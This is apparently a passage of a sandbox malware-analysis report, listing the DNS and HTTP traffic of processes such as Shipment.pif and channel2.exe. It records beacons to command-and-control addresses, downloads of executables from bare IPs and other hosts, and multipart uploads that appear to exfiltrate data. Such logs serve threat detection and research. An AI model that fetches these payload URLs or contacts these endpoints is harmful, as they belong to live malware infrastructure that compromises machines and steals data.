User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: traineiwnqo.shop

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:39:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=uecnu73bdk3jc3ri07nv96j4rp; expires=Wed, 25 Dec 2024 04:26:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3gCUpQnleJ9Xb3cyIYxLKHJkpbWBy7c6im9U4EzZucNBGPtmrHtAGnpMSgKC39VFRdDDukOlZ%2F%2BmUb4uLBXFjFC41kEcGwsqXNHwNRqZJIrGrGfW1h5gEVaKqRLeSeLT1SR7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc66053a184970-LHR
alt-svc: h3=":443"; ma=86400
DNS

240.177.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.177.67.172.in-addr.arpa

IN PTR

Response
DNS

cgil.in

axplong.exe

Remote address:

8.8.8.8:53

Request

cgil.in

IN A

Response

cgil.in

IN A

69.57.172.44
GET

https://cgil.in/storage/openvpn12.exe

axplong.exe

Remote address:

69.57.172.44:443

Request

GET /storage/openvpn12.exe HTTP/1.1
Host: cgil.in

Response

HTTP/1.1 404 Not Found

Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1238
date: Sat, 31 Aug 2024 10:40:08 GMT
server: LiteSpeed
vary: User-Agent
DNS

44.172.57.69.in-addr.arpa

Remote address:

8.8.8.8:53

Request

44.172.57.69.in-addr.arpa

IN PTR

Response

44.172.57.69.in-addr.arpa

IN PTR

s804bom1mysecurecloudhostcom
DNS

40.13.222.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.13.222.173.in-addr.arpa

IN PTR

Response

40.13.222.173.in-addr.arpa

IN PTR

a173-222-13-40deploystaticakamaitechnologiescom
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

IuUBYrPCAO.IuUBYrPCAO

Shipment.pif

Remote address:

8.8.8.8:53

Request

IuUBYrPCAO.IuUBYrPCAO

IN A

Response
DNS

evoliutwoqm.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

evoliutwoqm.shop

IN A

Response
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

104.21.58.213:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:40:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=0has4jjtgtth170o3tu27as3en; expires=Wed, 25 Dec 2024 04:27:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YtN%2BQc%2FkKeG53uuCfDnRtK7odsniSq5LpqpFvzGeWdA2n3NUZazFCCAohyfAeNDYVB465EkUZiltqB9geyuIoY6kJljVkkRr1dDOWBGfo7PDtH2qF0C8r4d6dTvG0b8fs8fnr1s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc6703d8b752ea-LHR
alt-svc: h3=":443"; ma=86400
POST

https://traineiwnqo.shop/api

BitLockerToGo.exe

Remote address:

172.67.177.240:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: traineiwnqo.shop

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:40:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8BL5RpJRwC%2F%2Bkim0gnnrVxSBXEPUBH%2FVqaQ7NkBQ5Rq6E4N6WllHsmBPo18Myu8z4GlBT5nEcd%2B5NTyvI3MIh9j8V%2BxTj3P%2FkkKoIWenMJNKXrmTfQA7GegA4B25w07uMWD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc67064e4b6437-LHR
POST

https://traineiwnqo.shop/api

BitLockerToGo.exe

Remote address:

172.67.177.240:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=XDxhh2vr22GMCXEVe1Jimdff71PbRqUrzxjjJWElMOY-1725100826-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: traineiwnqo.shop

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:40:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=q9pg25rer7kmh6a8j0r49d1l2n; expires=Wed, 25 Dec 2024 04:27:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8a7EsN5uWrTZ2OYdXiH%2FCtL0aAsaW7CqAFZ21aoPXWE8UFIxUuB%2Bm9C4jQcdCwNmr2QU9o3fIaWd58jcVRZ3UygrEHMpCBrxF7mb%2BGMJXY3Uixkq%2BwHg7uFkPlXY5FJlZkg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc67072f8f6437-LHR
alt-svc: h3=":443"; ma=86400
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.19/CoreOPT/index.php

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php?scr=1

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODc5MTQ=
Host: 185.215.113.19
Content-Length: 88066
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:41:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:41:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:41:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Shipment.pif

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:41:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://103.130.147.211/Files/channel2.exe

Shipment.pif

Remote address:

103.130.147.211:80

Request

GET /Files/channel2.exe HTTP/1.1
Host: 103.130.147.211

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:40:42 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 30 Aug 2024 18:21:14 GMT
ETag: "656ca9-620eaa80bf729"
Accept-Ranges: bytes
Content-Length: 6646953
Content-Type: application/x-msdownload
DNS

jirafasaltas.fun

BitcoinCore.exe

Remote address:

8.8.8.8:53

Request

jirafasaltas.fun

IN A

Response

jirafasaltas.fun

IN A

172.67.193.102

jirafasaltas.fun

IN A

104.21.57.227
DNS

jirafasaltas.fun

BitcoinCore.exe

Remote address:

8.8.8.8:53

Request

jirafasaltas.fun

IN A

Response

jirafasaltas.fun

IN A

104.21.57.227

jirafasaltas.fun

IN A

172.67.193.102
POST

https://jirafasaltas.fun/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU

BitcoinCore.exe

Remote address:

172.67.193.102:443

Request

POST /shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 96
Host: jirafasaltas.fun

Response

HTTP/1.1 204 No Content

Date: Sat, 31 Aug 2024 10:40:42 GMT
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XeH1AaI6lZC2lfU%2FqSykr40cxReF23k376EI90DxqLgLrd3QkCVUY%2FS9jKwrG%2FgxJym2FUu1NQ%2F%2FEJ8rje8QESziAL%2FKcKLDAsBGZQEecMZ2e2J1HoO0Lw%2FI9p%2BN3crYibm2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc6767dbe2bef8-LHR
alt-svc: h3=":443"; ma=86400
DNS

19.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.113.215.185.in-addr.arpa

IN PTR

Response
DNS

211.147.130.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.147.130.103.in-addr.arpa

IN PTR

Response
DNS

211.147.130.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.147.130.103.in-addr.arpa

IN PTR

Response
DNS

102.193.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

102.193.67.172.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 580155
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8BB0D50F31264A22A1324F7BBC0026F3 Ref B: LON04EDGE1110 Ref C: 2024-08-31T10:40:51Z
date: Sat, 31 Aug 2024 10:40:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360608910_1R4TEUG1LRQY39K7S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360608910_1R4TEUG1LRQY39K7S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 663065
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B63630DAE76A40BD8502A25E46524E54 Ref B: LON04EDGE1110 Ref C: 2024-08-31T10:40:51Z
date: Sat, 31 Aug 2024 10:40:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360608909_1XWUMGMD2M0J0LDVR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360608909_1XWUMGMD2M0J0LDVR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 315631
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BFE3B989F057441BAA2D64ADD741EF03 Ref B: LON04EDGE1110 Ref C: 2024-08-31T10:40:51Z
date: Sat, 31 Aug 2024 10:40:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301217_1LGEUWZHPMKMEMITB&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239317301217_1LGEUWZHPMKMEMITB&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 594481
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5C2D9432F6EE4F239DC03D7DB0528706 Ref B: LON04EDGE1110 Ref C: 2024-08-31T10:40:51Z
date: Sat, 31 Aug 2024 10:40:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 241999
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E0814BC706224BF8B4E2707E600078BF Ref B: LON04EDGE1110 Ref C: 2024-08-31T10:40:51Z
date: Sat, 31 Aug 2024 10:40:51 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301626_12UQHHQXE25HHMLCY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239317301626_12UQHHQXE25HHMLCY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 540101
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C5173095C854475793A58D77279B9099 Ref B: LON04EDGE1110 Ref C: 2024-08-31T10:40:51Z
date: Sat, 31 Aug 2024 10:40:51 GMT
GET

http://45.200.149.147/BowExpert.exe

Shipment.pif

Remote address:

45.200.149.147:80

Request

GET /BowExpert.exe HTTP/1.1
Host: 45.200.149.147

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:40:57 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10
Last-Modified: Tue, 27 Aug 2024 18:59:24 GMT
ETag: "159690-620aed70b4399"
Accept-Ranges: bytes
Content-Length: 1414800
Content-Type: application/x-msdownload
DNS

147.149.200.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.149.200.45.in-addr.arpa

IN PTR

Response
DNS

8.167.79.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.167.79.40.in-addr.arpa

IN PTR

Response
GET

http://103.130.147.211/Files/Channel1.exe

Shipment.pif

Remote address:

103.130.147.211:80

Request

GET /Files/Channel1.exe HTTP/1.1
Host: 103.130.147.211

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:41:01 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 30 Aug 2024 17:54:09 GMT
ETag: "65ac76-620ea473c603e"
Accept-Ranges: bytes
Content-Length: 6663286
Content-Type: application/x-msdownload
DNS

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

Intake.pif

Remote address:

8.8.8.8:53

Request

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

IN A

Response
DNS

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

Intake.pif

Remote address:

8.8.8.8:53

Request

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

IN A

Response
DNS

thixv13ht.top

channel2.exe

Remote address:

8.8.8.8:53

Request

thixv13ht.top

IN A

Response

thixv13ht.top

IN A

195.133.13.230
DNS

thixv13ht.top

channel2.exe

Remote address:

8.8.8.8:53

Request

thixv13ht.top

IN A

Response

thixv13ht.top

IN A

195.133.13.230
POST

http://thixv13ht.top/v1/upload.php

channel2.exe

Remote address:

195.133.13.230:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary90472363
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 412
Host: thixv13ht.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Sat, 31 Aug 2024 10:41:05 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST

http://thixv13ht.top/v1/upload.php

channel2.exe

Remote address:

195.133.13.230:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary78671349
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 78044
Host: thixv13ht.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Sat, 31 Aug 2024 10:41:08 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST

http://thixv13ht.top/v1/upload.php

channel2.exe

Remote address:

195.133.13.230:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary12543882
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 77114
Host: thixv13ht.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Sat, 31 Aug 2024 10:41:12 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

230.13.133.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

230.13.133.195.in-addr.arpa

IN PTR

Response
DNS

2x.si

Shipment.pif

Remote address:

8.8.8.8:53

Request

2x.si

IN A

Response

2x.si

IN A

172.67.143.156

2x.si

IN A

104.21.27.222
GET

https://2x.si/PQP.exe

Shipment.pif

Remote address:

172.67.143.156:443

Request

GET /PQP.exe HTTP/1.1
Host: 2x.si

Response

HTTP/1.1 200 OK

Date: Sat, 31 Aug 2024 10:41:11 GMT
Content-Type: application/octet-stream
Content-Length: 732672
Connection: keep-alive
etag: "66cf5fff-b2e00"
last-modified: Wed, 28 Aug 2024 17:35:59 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 5548
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtMSPBy41uIIZaweAqlAwyiMmZbwVoJorKQxxDzOj878Ct1ocDWA6x3onstb9ciSrqForf23MQxNRFi9CXkvTXCTvy3%2FnzVTw78siTe0RhcFP%2F1U3HAaQg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bbc681fbf0d491c-LHR
alt-svc: h3=":443"; ma=86400
DNS

c.pki.goog

Shipment.pif

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
GET

http://c.pki.goog/r/gsr1.crl

Shipment.pif

Remote address:

142.250.178.3:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
